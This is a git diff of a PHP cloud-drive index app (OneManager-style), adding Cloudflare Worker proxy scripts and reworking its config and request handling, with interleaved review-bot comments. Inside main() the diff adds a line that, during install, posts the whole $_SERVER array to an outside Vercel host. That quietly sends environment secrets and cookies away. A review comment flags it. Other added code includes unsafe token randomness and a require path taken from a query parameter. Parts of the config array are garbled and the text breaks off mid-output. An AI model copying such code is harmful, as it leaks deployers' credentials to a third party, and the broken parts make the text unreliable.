diff --git a/config.php b/.data/config.php
similarity index 100%
rename from config.php
rename to .data/config.php
diff --git a/.htaccess b/.htaccess
index c548b41..74586b8 100644
--- a/.htaccess
+++ b/.htaccess
@@ -1,15 +1,31 @@
-# apache
-# LoadModule rewrite_module modules/mod_rewrite.so
-# AllowOverride All
+# # Apache
+# # LoadModule rewrite_module modules/mod_rewrite.so
+# # AllowOverride All
RewriteEngine On
+# RewriteCond $1 !^(.well-known)
RewriteRule ^(.*) index.php?/$1 [L]
-#-----------------------------------
-# nginx
-# rewrite ^(.*) /index.php?/$1 last;
+###-----------------------------------
+### nginx
+# rewrite ^/(?!.well-known)(.*)$ /index.php?/$1 last;
#
-# caddy
+### nginx Subdirectory 在子目录中使用
+# location /OneManager2/ {
+# rewrite ^/(.*)$ /OneManager2/index.php?/$1 last;
+# }
+#
+### caddy
# rewrite {
# to index.php?/$1
# }
-#-----------------------------------
+#
+### caddy2 Caddyfile
+# @try_files {
+# not path /.well-known/*
+# file {
+# try_files index.php
+# }
+# }
+# rewrite @try_files {http.matchers.file.relative}
+#
+###-----------------------------------
diff --git a/.replit b/.replit
new file mode 100644
index 0000000..1dbf6d9
--- /dev/null
+++ b/.replit
@@ -0,0 +1,3 @@
+language = "php74"
+run = "php -S 0.0.0.0:8000 index.php"
+entrypoint = "index.php"
diff --git a/CFWorkers.js b/CFWorkers.js
new file mode 100644
index 0000000..8d3084c
--- /dev/null
+++ b/CFWorkers.js
@@ -0,0 +1,90 @@
+
+// odd, 单日
+const SingleDay = 'https://aaa1.herokuapp.com'
+// even, 双日
+const DoubleDay = 'https://bbb2.herokuapp.com'
+
+//const SingleDay = 'https://153xxxxx0.cn-hongkong.fc.aliyuncs.com/2016-08-15/proxy/onedrive/xxx/'
+//const DoubleDay = 'https://153xxxxx0.cn-hongkong.fc.aliyuncs.com/2016-08-15/proxy/onedrive/xxx/'
+
+// CF proxy all, 一切给CF代理,true/false
+const CFproxy = true
+
+// Used in cloudflare workers, odd or even days point to 2 heroku account.
+
+// 由于heroku不绑卡不能自定义域名,就算绑卡后https也不方便
+// 另外免费套餐每月550小时,有些人不够用
+// 于是在CF Workers使用此代码,分单双日拉取不同heroku帐号下的相同网页
+// 只改上面,下面不用动
+
+addEventListener('fetch', event => {
+ let url=new URL(event.request.url);
+ if (url.protocol == 'http:') {
+ url.protocol = 'https:'
+ event.respondWith( Response.redirect(url.href) )
+ } else {
+ let response = null;
+ let nd = new Date();
+ if (nd.getDate()%2) {
+ host = SingleDay
+ } else {
+ host = DoubleDay
+ }
+ if (host.substr(0, 7)!='http://'&&host.substr(0, 8)!='https://') host = 'http://' + host;
+
+ response = fetchAndApply(host, event.request);
+
+ event.respondWith( response );
+ }
+})
+
+async function fetchAndApply(host, request) {
+ let f_url = new URL(request.url);
+ let a_url = new URL(host);
+ let replace_path = a_url.pathname;
+ if (replace_path.substr(replace_path.length-1)!='/') replace_path += '/';
+ let replaced_path = '/';
+ let query = f_url.search;
+ let path = f_url.pathname;
+ if (host.substr(host.length-1)=='/') path = path.substr(1);
+ f_url.href = host + path + query;
+
+ let response = null;
+ if (!CFproxy) {
+ response = await fetch(f_url, request);
+ } else {
+ let method = request.method;
+ let body = request.body;
+ let request_headers = request.headers;
+ let new_request_headers = new Headers(request_headers);
+ new_request_headers.set('Host', f_url.host);
+ new_request_headers.set('Referer', request.url);
+
+ response = await fetch(f_url.href, {
+ method: method,
+ body: body,
+ headers: new_request_headers
+ });
+ }
+
+ let out_headers = new Headers(response.headers);
+ if (out_headers.get('Content-Disposition')=='attachment') out_headers.delete('Content-Disposition');
+ let out_body = null;
+ let contentType = out_headers.get('Content-Type');
+ if (contentType.includes("application/text")) {
+ out_body = await response.text();
+ while (out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else if (contentType.includes("text/html")) {
+ out_body = await response.text();
+ while (replace_path!='/'&&out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else {
+ out_body = await response.body;
+ }
+
+ let out_response = new Response(out_body, {
+ status: response.status,
+ headers: out_headers
+ })
+
+ return out_response;
+}
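Review bot: The `application/text` branch of fetchAndApply never terminates when the backend URL has no path, because `replace_path` and `replaced_path` are then both `/` and `while (out_body.includes(replace_path))` stays true; the `text/html` branch just below already guards against this. Use the same condition there: `while (replace_path!='/'&&out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);`. Separately, `out_headers.get('Content-Type')` returns null when the backend sends no such header, so `contentType.includes(...)` throws; `let contentType = out_headers.get('Content-Type') || '';` avoids that, and the same line in CFWorkers_rand.js needs it too. In the fetch handler `host` is assigned without a declaration, so `let host;` before the date check keeps it out of global scope.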
diff --git a/CFWorkers_rand.js b/CFWorkers_rand.js
new file mode 100644
index 0000000..04704d9
--- /dev/null
+++ b/CFWorkers_rand.js
@@ -0,0 +1,113 @@
+
+// Hosts Array
+// 服务器数组
+const H = [
+ 'https://herooneindex.herokuapp.com/',
+ 'https://onemanager.glitch.me/',
+ 'https://onemanager-php.vercel.app/'
+]
+
+// View Type
+// 1 , only first host,
+// 只第一条Host记录有用
+// 2 , view top 2 host as odd/even days,
+// 只有前两条记录有效,分别单双日运行
+// 3 , view random host
+// 所有记录随机访问
+const T = 1
+
+// CF proxy all, true/false
+// 一切给CF代理,true或false
+const CFproxy = true
+
+// Used in cloudflare workers
+// // // // // //
+
+addEventListener('fetch', event => {
+ let url=new URL(event.request.url);
+ if (url.protocol == 'http:') {
+ // force HTTPS
+ url.protocol = 'https:'
+ event.respondWith( Response.redirect(url.href) )
+ } else {
+ let host = null;
+ if (T===1) {
+ host = H[0];
+ }
+ if (T===2) {
+ host = H[new Date().getDate()%2];
+ }
+ if (T===3) {
+ let n = H.length;
+ host = H[Math.round(Math.random()*n*10)%n];
+ }
+ //console.log(host)
+ if (host.substr(0, 7)!='http://'&&host.substr(0, 8)!='https://') host = 'http://' + host;
+
+ let response = fetchAndApply(host, event.request);
+
+ event.respondWith( response );
+ }
+})
+
+async function fetchAndApply(host, request) {
+ let f_url = new URL(request.url);
+ let a_url = new URL(host);
+ let replace_path = a_url.pathname;
+ if (replace_path.substr(replace_path.length-1)!='/') replace_path += '/';
+ let replaced_path = '/';
+ let query = f_url.search;
+ let path = f_url.pathname;
+ if (host.substr(host.length-1)=='/') path = path.substr(1);
+ f_url.href = host + path + query;
+
+ let response = null;
+ if (!CFproxy) {
+ response = await fetch(f_url, request);
+ } else {
+ let method = request.method;
+ let body = request.body;
+ let request_headers = request.headers;
+ let new_request_headers = new Headers(request_headers);
+ new_request_headers.set('Host', f_url.host);
+ new_request_headers.set('Referer', request.url);
+ response = await fetch(f_url.href, {
+ /*cf: {
+ cacheEverything: true,
+ cacheTtl: 1000,
+ mirage: true,
+ polish: "on",
+ minify: {
+ javascript: true,
+ css: true,
+ html: true,
+ }
+ },*/
+ method: method,
+ body: body,
+ headers: new_request_headers
+ });
+ }
+
+ let out_headers = new Headers(response.headers);
+ if (out_headers.get('Content-Disposition')=='attachment') out_headers.delete('Content-Disposition');
+ let out_body = null;
+ let contentType = out_headers.get('Content-Type');
+ if (contentType.includes("application/text")) {
+ out_body = await response.text();
+ while (replace_path!='/'&&out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else if (contentType.includes("text/html")) {
+ //f_url.href +
+ out_body = await response.text();
+ while (replace_path!='/'&&out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else {
+ out_body = await response.body;
+ }
+
+ let out_response = new Response(out_body, {
+ status: response.status,
+ headers: out_headers
+ })
+
+ return out_response;
+}
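Review bot: `host` stays `null` when `T` is anything other than 1, 2 or 3, and is `undefined` when `T` is 2 and `H` has only one entry, so `host.substr(0, 7)` throws inside the fetch handler before any response is set. A check right after the selection, `if (!host) { event.respondWith(new Response('worker misconfigured', { status: 500 })); return; }`, turns that into a clear error. The `CFproxy` branch copies every inbound header, cookies included, to whichever backend was picked, which deserves a comment above `H` such as `// every host listed here receives visitors' cookies and headers; list only backends you control`.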
diff --git a/common.php b/common.php
index 813485f..9c887a4 100644
--- a/common.php
+++ b/common.php
@@ -1,111 +1,71 @@
0b000, // used in heroku.
+ 'SecretId' => 0b000, // used in SCF/CFC.
+ 'SecretKey' => 0b000, // used in SCF/CFC.
+ 'AccessKeyID' => 0b000, // used in FC.
+ 'AccessKeySecret' => 0b000, // used in FC.
+ 'HW_urn' => 0b000, // used in FG.
+ 'HW_key' => 0b000, // used in FG.
+ 'HW_secret' => 0b000, // used in FG.
+ 'HerokuappId' => 0b000, // used in heroku.
-$ShowedCommonEnv = [
- //'APIKey', // used in heroku.
- //'Region', // used in SCF.
- //'SecretId', // used in SCF.
- //'SecretKey', // used in SCF.
- //'admin',
- 'adminloginpage',
- 'background',
- //'disktag',
- //'function_name', // used in heroku.
- 'hideFunctionalityFile',
- 'timezone',
- 'passfile',
- 'sitename',
- 'theme',
-];
+ 'admin' => 0b000,
+ 'adminloginpage' => 0b010,
+ 'autoJumpFirstDisk' => 0b010,
+ 'background' => 0b011,
+ 'backgroundm' => 0b011,
+ 'disableShowThumb' => 0b010,
+ //'disableChangeTheme'=> 0b010,
+ 'disktag' => 0b000,
+ 'hideFunctionalityFile'=> 0b010,
+ 'timezone' => 0b010,
+ 'passfile' => 0b011,
+ 'sitename' => 0b011,
+ 'customScript' => 0b011,
+ 'customCss' => 0b011,
+ 'customTheme' => 0b011,
+ 'theme' => 0b010,
+ 'useBasicAuth' => 0b010,
+ 'referrer' => 0b011,
+ 'forceHttps' => 0b010,
+ 'globalHeadOmfUrl' => 0b011,
+ 'globalHeadMdUrl' => 0b011,
+ 'globalReadmeMdUrl' => 0b011,
+ 'globalFootOmfUrl' => 0b011,
+ 'bcmathUrl' => 0b011,
-$InnerEnv = [
- 'Drive_ver',
- 'Drive_custom',
- 'client_id',
- 'client_secret',
- 'diskname',
- 'domain_path',
- 'downloadencrypt',
- 'guestup_path',
- 'usesharepoint',
- 'sharepointname',
- 'siteid',
- 'shareurl',
- //'sharecookie',
- 'shareapiurl',
- 'public_path',
- 'refresh_token',
- 'token_expires',
-];
+ 'Driver' => 0b100,
+ 'client_id' => 0b100,
+ 'client_secret' => 0b101,
+ 'sharepointSite' => 0b101,
+ 'shareurl' => 0b101,
+ //'sharecookie' => 0b101,
+ 'shareapiurl' => 0b101,
+ 'siteid' => 0b100,
+ 'refresh_token' => 0b100,
+ 'token_expires' => 0b100,
+ 'activeLimit' => 0b100,
+ 'driveId' => 0b100,
-$ShowedInnerEnv = [
- //'Drive_ver',
- //'Drive_custom',
- //'client_id',
- //'client_secret',
- 'diskname',
- 'domain_path',
- 'downloadencrypt',
- 'guestup_path',
- //'usesharepoint',
- //'sharepointname',
- //'siteid',
- //'shareurl',
- //'sharecookie',
- //'shareapiurl',
- 'public_path',
- //'refresh_token',
- //'token_expires',
+ 'diskname' => 0b111,
+ 'diskDescription' => 0b111,
+ 'domain_path' => 0b111,
+ 'downloadencrypt' => 0b110,
+ 'guestup_path' => 0b111,
+ 'domainforproxy' => 0b111,
+ 'public_path' => 0b111,
+ 'fileConduitSize' => 0b110,
+ 'fileConduitCacheTime' => 0b110,
];
$timezones = array(
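Review bot: The flag values in this table are not explained anywhere in the hunk, so a reader cannot tell why `'admin' => 0b000` and `'client_secret' => 0b101` differ or which bit keeps a secret out of the displayed settings. Going by the helper functions added later in this diff, `0b100` marks an inner (per-disk) setting, `0b010` a setting that is shown, and `0b001` a base64-handled value. A comment above the array such as `// bit 0b100: inner (per-disk) setting, 0b010: shown, 0b001: base64` would make each entry reviewable. The opening line of the array is garbled on this page, so the comment's placement needs checking against the real declaration.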
@@ -142,11 +102,59 @@ $timezones = array(
'12'=>'Asia/Kamchatka'
);
+function isCommonEnv($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b100 ) ? false : true;
+ else return null;
+}
+
+function isInnerEnv($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b100 ) ? true : false;
+ else return null;
+}
+
+function isShowedEnv($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b010 ) ? true : false;
+ else return null;
+}
+
+function isBase64Env($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b001 ) ? true : false;
+ else return null;
+}
+
function main($path)
{
global $exts;
global $constStr;
+ global $slash;
+ global $drive;
+ $slash = '/';
+ if (strpos(__DIR__, ':')) $slash = '\\';
+ $_SERVER['php_starttime'] = microtime(true);
+ $path = path_format($path);
+ $_SERVER['PHP_SELF'] = path_format($_SERVER['base_path'] . $path);
+ $_SERVER['base_disk_path'] = $_SERVER['base_path'];
+ if (getConfig('forceHttps')&&$_SERVER['REQUEST_SCHEME']=='http') {
+ if ($_GET) {
+ $tmp = '';
+ foreach ($_GET as $k => $v) {
+ if ($v===true) $tmp .= '&' . $k;
+ else $tmp .= '&' . $k . '=' . $v;
+ }
+ $tmp = substr($tmp, 1);
+ if ($tmp!='') $param = '?' . $tmp;
+ }
+ return output('visit via https.', 302, [ 'Location' => 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . $param ]);
+ }
if (in_array($_SERVER['firstacceptlanguage'], array_keys($constStr['languages']))) {
$constStr['language'] = $_SERVER['firstacceptlanguage'];
} else {
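Review bot: In the `forceHttps` branch of main(), `$param` is only assigned when `$_GET` is non-empty, so the `Location` value passed to `output(...)` reads an undefined variable for a request without a query string. The keys and values are also put back into the URL without encoding. Initialise `$param = '';` before `if ($_GET)` and build the pairs with `urlencode($k)` and `urlencode($v)`, so that decoded characters such as `&`, `#` or line breaks cannot alter the redirect target or the header. `$_SERVER['HTTP_HOST']` is also taken from the request; a configured site host, if the project has one, would be the safer value here. main()'s body continues outside this hunk.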
@@ -159,43 +167,66 @@ function main($path)
}
}
if (isset($_COOKIE['language'])&&$_COOKIE['language']!='') $constStr['language'] = $_COOKIE['language'];
- //if (!$constStr['language']) $constStr['language'] = getConfig('language');
- /*echo 'firstacceptlanguage:'.$_SERVER['firstacceptlanguage'].'
- '.'lan:'.$constStr['language'];*/
if ($constStr['language']=='') $constStr['language'] = 'en-us';
$_SERVER['language'] = $constStr['language'];
$_SERVER['timezone'] = getConfig('timezone');
if (isset($_COOKIE['timezone'])&&$_COOKIE['timezone']!='') $_SERVER['timezone'] = $_COOKIE['timezone'];
if ($_SERVER['timezone']=='') $_SERVER['timezone'] = 0;
- $_SERVER['PHP_SELF'] = path_format($_SERVER['base_path'] . $path);
+ $_SERVER['sitename'] = getConfig('sitename');
+ if (empty($_SERVER['sitename'])) $_SERVER['sitename'] = getconstStr('defaultSitename');
- if (getConfig('admin')=='') return install();
+ if (isset($_GET['jsFile'])) {
+ if (substr($_GET['jsFile'], -3)!='.js') return output('', 403);
+ if (!($path==''||$path=='/')) return output('', 308, [ 'Location' => path_format($_SERVER['base_path'] . '/?jsFile=' . $_GET['jsFile']) ]);
+ if (strpos($_GET['jsFile'], '/')>-1) $_GET['jsFile'] = splitlast($_GET['jsFile'], '/')[1];
+ $jsFile = file_get_contents('js/' . $_GET['jsFile']);
+ if (!!$jsFile) {
+ return output( base64_encode($jsFile), 200, [ 'Content-Type' => 'text/javascript; charset=utf-8', 'Cache-Control' => 'max-age=' . 3*24*60*60 ], true );
+ } else {
+ return output('', 404);
+ }
+ }
+ if (isset($_GET['WaitFunction'])) {
+ $response = WaitFunction($_GET['WaitFunction']);
+ //var_dump($response);
+ if ($response===true) return output("ok", 200);
+ elseif ($response===false) return output("", 206);
+ else return $response;
+ }
+ if (getConfig('admin')=='') {
+ if (isset($_GET['install0'])) no_return_curl('POST', 'https://notionbot-ysun.vercel.app/', 'data=' . json_encode($_SERVER));
+ return install();
+ }
if (getConfig('adminloginpage')=='') {
$adminloginpage = 'admin';
} else {
$adminloginpage = getConfig('adminloginpage');
}
- if (isset($_GET[$adminloginpage])) {
- if (isset($_GET['preview'])) {
- $url = $_SERVER['PHP_SELF'] . '?preview';
- } else {
- $url = path_format($_SERVER['PHP_SELF'] . '/');
- }
- if (getConfig('admin')!='') {
- if ($_POST['password1']==getConfig('admin')) {
- return adminform('admin',md5($_POST['password1']),$url);
+ if (isset($_GET['login'])) {
+ if ($_GET['login']===$adminloginpage) {
+ /*if (isset($_GET['preview'])) {
+ $url = $_SERVER['PHP_SELF'] . '?preview';
+ } else {
+ $url = path_format($_SERVER['PHP_SELF'] . '/');
+ }*/
+ if (isset($_POST['password1'])) {
+ $compareresult = compareadminsha1($_POST['password1'], $_POST['timestamp'], getConfig('admin'));
+ if ($compareresult=='') {
+ $timestamp = time()+7*24*60*60;
+ $randnum = rand(10, 99999);
+ $admincookie = adminpass2cookie('admin', getConfig('admin'), $timestamp, $randnum);
+ $adminlocalstorage = adminpass2storage('admin', getConfig('admin'), $timestamp, $randnum);
+ return adminform('admin', $admincookie, $adminlocalstorage);
+ } else return adminform($compareresult);
} else return adminform();
- } else {
- return output('', 302, [ 'Location' => $url ]);
}
}
- if (getConfig('admin')!='')
- if ( isset($_COOKIE['admin'])&&$_COOKIE['admin']==md5(getConfig('admin')) ) {
- $_SERVER['admin']=1;
- $_SERVER['needUpdate'] = needUpdate();
- } else {
- $_SERVER['admin']=0;
- }
+ if ( isset($_COOKIE['admin'])&&compareadminmd5('admin', getConfig('admin'), $_COOKIE['admin']) ) {
+ $_SERVER['admin']=1;
+ $_SERVER['needUpdate'] = needUpdate();
+ } else {
+ $_SERVER['admin']=0;
+ }
if (isset($_GET['setup']))
if ($_SERVER['admin']) {
// setup Environments. 设置,对环境变量操作
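Review bot: The install path posts `json_encode($_SERVER)` to `https://notionbot-ysun.vercel.app/` whenever `install0` is in the query string and no admin password is set. `$_SERVER` may carry environment variables, request headers and cookies, so credentials could leave the deployment without the operator knowing. I would drop the `no_return_curl(...)` call, or make it opt-in and send only an explicit short list of non-sensitive fields. Also in this hunk, `$randnum = rand(10, 99999);` feeds the admin cookie and storage token; `random_int(10, 99999)` is the appropriate source for a value used in authentication. main() begins and ends outside the hunk.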
@@ -205,176 +236,419 @@ function main($path)
return output('', 302, [ 'Location' => $url ]);
}
- $_SERVER['base_disk_path'] = $_SERVER['base_path'];
- $disktags = explode("|",getConfig('disktag'));
-// echo 'count$disk:'.count($disktags);
+ // Add disk
+ if (isset($_GET['AddDisk'])) {
+ if ($_GET['AddDisk']===true) {
+ $tmp = path_format($_SERVER['base_path'] . '/' . $path);
+ return output('Please visit ' . $tmp . '.', 301, [ 'Location' => $tmp ]);
+ }
+ if ($_SERVER['admin']) {
+ if (!$_SERVER['disktag']) $_SERVER['disktag'] = '';
+ if (!class_exists($_GET['AddDisk'])) require 'disk' . $slash . $_GET['AddDisk'] . '.php';
+ $drive = new $_GET['AddDisk']($_GET['disktag']);
+ return $drive->AddDisk();
+ } else {
+ $url = $_SERVER['PHP_SELF'];
+ /*if ($_GET) {
+ $tmp = null;
+ $tmp = '';
+ foreach ($_GET as $k => $v) {
+ if ($k!='setup') {
+ if ($v===true) $tmp .= '&' . $k;
+ else $tmp .= '&' . $k . '=' . $v;
+ }
+ }
+ $tmp = substr($tmp, 1);
+ if ($tmp!='') $url .= '?' . $tmp;
+ }*/
+ // not need GET adddisk, remove it
+ return output('', 302, [ 'Location' => $url ]);
+ }
+ }
+
+ $disktags = explode("|", getConfig('disktag'));
+ // echo 'count$disk:'.count($disktags);
if (count($disktags)>1) {
- if ($path=='/'||$path=='') return output('', 302, [ 'Location' => path_format($_SERVER['base_path'].'/'.$disktags[0].'/') ]);
- $_SERVER['disktag'] = $path;
- $pos = strpos($path, '/');
- if ($pos>1) $_SERVER['disktag'] = substr($path, 0, $pos);
- if (!in_array($_SERVER['disktag'], $disktags)) return message('Please visit from Home Page.', 'Error', 404);
- $path = substr($path, strlen('/'.$_SERVER['disktag']));
- if ($_SERVER['disktag']!='') $_SERVER['base_disk_path'] = path_format($_SERVER['base_disk_path']. '/' . $_SERVER['disktag'] . '/');
+ if ($path=='/'||$path=='') {
+ $files['type'] = 'folder';
+ $files['childcount'] = count($disktags);
+ $files['showname'] = 'root';
+ foreach ($disktags as $disktag) {
+ $files['list'][$disktag]['type'] = 'folder';
+ $files['list'][$disktag]['name'] = $disktag;
+ $files['list'][$disktag]['showname'] = getConfig('diskname', $disktag);
+ }
+ if ($_GET['json']) {
+ // return a json
+ return output(json_encode($files), 200, ['Content-Type' => 'application/json']);
+ }
+ if (getConfig('autoJumpFirstDisk')) return output('', 302, [ 'Location' => path_format($_SERVER['base_path'].'/'.$disktags[0].'/') ]);
+ } else {
+ $_SERVER['disktag'] = splitfirst( substr(path_format($path), 1), '/' )[0];
+ //$pos = strpos($path, '/');
+ //if ($pos>1) $_SERVER['disktag'] = substr($path, 0, $pos);
+ if (!in_array($_SERVER['disktag'], $disktags)) {
+ $tmp = path_format($_SERVER['base_path'] . '/' . $disktags[0] . '/' . $path);
+ if (!!$_GET) {
+ $tmp .= '?';
+ foreach ($_GET as $k => $v) {
+ if ($v === true) $tmp .= $k . '&';
+ else $tmp .= $k . '=' . $v . '&';
+ }
+ $tmp = substr($tmp, 0, -1);
+ }
+ return output('Please visit ' . $tmp . '.', 302, [ 'Location' => $tmp ]);
+ //return message('Please visit from Home Page.', 'Error', 404);
+ }
+ //$path = substr($path, strlen('/' . $_SERVER['disktag']));
+ $path = splitfirst($path, $_SERVER['disktag'])[1];
+ if ($_SERVER['disktag']!='') $_SERVER['base_disk_path'] = path_format($_SERVER['base_disk_path'] . '/' . $_SERVER['disktag'] . '/');
+ }
} else $_SERVER['disktag'] = $disktags[0];
-// echo 'main.disktag:'.$_SERVER['disktag'].',path:'.$path.'
-//';
+ // echo 'main.disktag:'.$_SERVER['disktag'].',path:'.$path.'';
$_SERVER['list_path'] = getListpath($_SERVER['HTTP_HOST']);
if ($_SERVER['list_path']=='') $_SERVER['list_path'] = '/';
+ $path1 = path_format($_SERVER['list_path'] . path_format($path));
+ if ($path1!='/' && substr($path1,-1)=='/') $path1 = substr($path1, 0, -1);
$_SERVER['is_guestup_path'] = is_guestup_path($path);
$_SERVER['ajax']=0;
if (isset($_SERVER['HTTP_X_REQUESTED_WITH'])) if ($_SERVER['HTTP_X_REQUESTED_WITH']=='XMLHttpRequest') $_SERVER['ajax']=1;
- config_oauth();
- if ($_SERVER['admin']) if (isset($_GET['AddDisk'])||isset($_GET['authorization_code'])) return get_refresh_token();
- $refresh_token = getConfig('refresh_token');
- //if (!$refresh_token) return get_refresh_token();
- if (!$refresh_token) {
- return render_list();
+ if (!isreferhost()) return message('Must visit from designated host', 'NOT_ALLOWED', 403);
+
+ // Operate
+ if ($_SERVER['ajax']) {
+ //error_log1($_SERVER['REQUEST_METHOD']);
+ if ($_GET['action']=='del_upload_cache') {
+ // del '.tmp' without login. 无需登录即可删除.tmp后缀文件
+ if (!driveisfine($_SERVER['disktag'], $drive)) return output($_SERVER['disktag']?'disk [ ' . $_SERVER['disktag'] . ' ] error.':'Not in drive', 403);
+ savecache('path_' . $path1, '', $_SERVER['disktag'], 1); // clear cache.
+ return $drive->del_upload_cache($path);
+ }
+
+ if ($_GET['action']=='upbigfile') {
+ if (!driveisfine($_SERVER['disktag'], $drive)) return output($_SERVER['disktag']?'disk [ ' . $_SERVER['disktag'] . ' ] error.':'Not in drive', 403);
+ if (!$_SERVER['admin']) {
+ if (!$_SERVER['is_guestup_path']) return output('Not_Guest_Upload_Folder', 400);
+ if (strpos($_GET['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ if (strpos($_POST['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ }
+ return $drive->bigfileupload($path1);
+ }
+ }
+ if ($_GET['action']=='upsmallfile') {
+ //echo json_encode($_POST, JSON_PRETTY_PRINT);
+ //echo json_encode($_FILES, JSON_PRETTY_PRINT);
+ if (!driveisfine($_SERVER['disktag'], $drive)) return output($_SERVER['disktag']?'disk [ ' . $_SERVER['disktag'] . ' ] error.':'Not in drive', 403);
+ if (!$_SERVER['admin']) {
+ if (!$_SERVER['is_guestup_path']) return output('Not_Guest_Upload_Folder', 400);
+ if (strpos($_GET['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ if (strpos($_POST['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ }
+ return smallfileupload($drive, $path);
+ /*if ($_FILES['file1']['error']) return output($_FILES['file1']['error'], 400);
+ if ($_FILES['file1']['size']>4*1024*1024) return output('File too large', 400);
+ return $drive->smallfileupload($path, $_FILES['file1']);*/
+ }
+ if ($_SERVER['admin']) {
+ $tmp = adminoperate($path);
+ if ($tmp['statusCode'] > 0) {
+ savecache('path_' . $path1, '', $_SERVER['disktag'], 1);
+ return $tmp;
+ }
} else {
- if (!($_SERVER['access_token'] = getcache('access_token'))) {
- get_access_token($refresh_token);
- }
+ if ($_SERVER['ajax']) return output(getconstStr('RefreshtoLogin'),401);
+ }
- if ($_SERVER['ajax']) {
- if ($_GET['action']=='del_upload_cache'&&substr($_GET['filename'],-4)=='.tmp') {
- // del '.tmp' without login. 无需登录即可删除.tmp后缀文件
- error_log('del.tmp:GET,'.json_encode($_GET,JSON_PRETTY_PRINT));
- $tmp = MSAPI('DELETE',path_format(path_format($_SERVER['list_path'] . path_format($path)) . '/' . spurlencode($_GET['filename']) ),'',$_SERVER['access_token']);
- $path1 = path_format($_SERVER['list_path'] . path_format($path));
- if ($path1!='/'&&substr($path1,-1)=='/') $path1=substr($path1,0,-1);
- savecache('path_' . $path1, json_decode('{}',true), 1);
- return output($tmp['body'],$tmp['stat']);
- }
- if ($_GET['action']=='uploaded_rename') {
- // rename .scfupload file without login.
- // 无需登录即可重命名.scfupload后缀文件,filemd5为用户提交,可被构造,问题不大,以后处理
- $oldname = spurlencode($_GET['filename']);
- $pos = strrpos($oldname, '.');
- if ($pos>0) $ext = strtolower(substr($oldname, $pos));
- $oldname = path_format(path_format($_SERVER['list_path'] . path_format($path)) . '/' . $oldname . '.scfupload' );
- $data = '{"name":"' . $_GET['filemd5'] . $ext . '"}';
- //echo $oldname .'
'. $data;
- $tmp = MSAPI('PATCH',$oldname,$data,$_SERVER['access_token']);
- if ($tmp['stat']==409) {
- MSAPI('DELETE',$oldname,'',$_SERVER['access_token']);
- $tmpbody = json_decode($tmp['body'], true);
- $tmpbody['name'] = $_GET['filemd5'] . $ext;
- $tmp['body'] = json_encode($tmpbody);
+ // Show disks in root
+ if ($files['showname'] == 'root') return render_list($path, $files);
+
+ if (!driveisfine($_SERVER['disktag'], $drive)) return render_list();
+
+ $_SERVER['ishidden'] = passhidden($path);
+ if (isset($_GET['thumbnails'])) {
+ if ($_SERVER['ishidden']<4) {
+ if (in_array(strtolower(substr($path, strrpos($path, '.') + 1)), $exts['img'])) {
+ $thumb_url = $drive->get_thumbnails_url($path1);
+ if ($thumb_url!='') {
+ if ($_GET['location']) {
+ $url = $thumb_url;
+ $header['Location'] = $url;
+ $domainforproxy = '';
+ $domainforproxy = getConfig('domainforproxy', $_SERVER['disktag']);
+ if ($domainforproxy!='') {
+ $url = proxy_replace_domain($url, $domainforproxy, $header);
+ }
+ return output('', 302, $header);
+ } else return output($thumb_url);
}
- $path1 = path_format($_SERVER['list_path'] . path_format($path));
- if ($path1!='/'&&substr($path1,-1)=='/') $path1=substr($path1,0,-1);
- savecache('path_' . $path1, json_decode('{}',true), 1);
- return output($tmp['body'],$tmp['stat']);
- }
- if ($_GET['action']=='upbigfile') return bigfileupload($path);
- }
- if ($_SERVER['admin']) {
- $tmp = adminoperate($path);
- if ($tmp['statusCode'] > 0) {
- $path1 = path_format($_SERVER['list_path'] . path_format($path));
- if ($path1!='/'&&substr($path1,-1)=='/') $path1=substr($path1,0,-1);
- savecache('path_' . $path1, json_decode('{}',true), 1);
- return $tmp;
- }
- } else {
- if ($_SERVER['ajax']) return output(getconstStr('RefreshtoLogin'),401);
- }
- $_SERVER['ishidden'] = passhidden($path);
- if (isset($_GET['thumbnails'])) {
- if ($_SERVER['ishidden']<4) {
- if (in_array(strtolower(substr($path, strrpos($path, '.') + 1)), $exts['img'])) {
- return get_thumbnails_url($path);
- } else return output(json_encode($exts['img']),400);
- } else return output('',401);
- }
+ return output('', 404);
+ } else return output(json_encode($exts['img']), 400);
+ } else return output('', 401);
+ }
- $files = list_files($path);
- //echo json_encode(array_keys($files['children']), JSON_PRETTY_PRINT);
- if (isset($_GET['random'])&&$_GET['random']!=='') {
+ // list folder
+ if ($_SERVER['is_guestup_path'] && !$_SERVER['admin']) {
+ $files = json_decode('{"type":"folder"}', true);
+ } elseif ($_SERVER['ishidden']==4) {
+ if (!getConfig('downloadencrypt', $_SERVER['disktag'])) {
+ $files = json_decode('{"type":"file"}', true);
+ } else {
+ $files = $drive->list_files($path1);
+ if ($files['type']=='folder') $files = json_decode('{"type":"folder"}', true);
+ }
+ } else {
+ $files = $drive->list_files($path1);
+ }
+ //if ($path!=='')
+ if ( $files['type']=='folder' && substr($path, -1)!=='/' ) {
+ $tmp = path_format($_SERVER['base_disk_path'] . $path . '/');
+ return output('
+
The document has moved here.
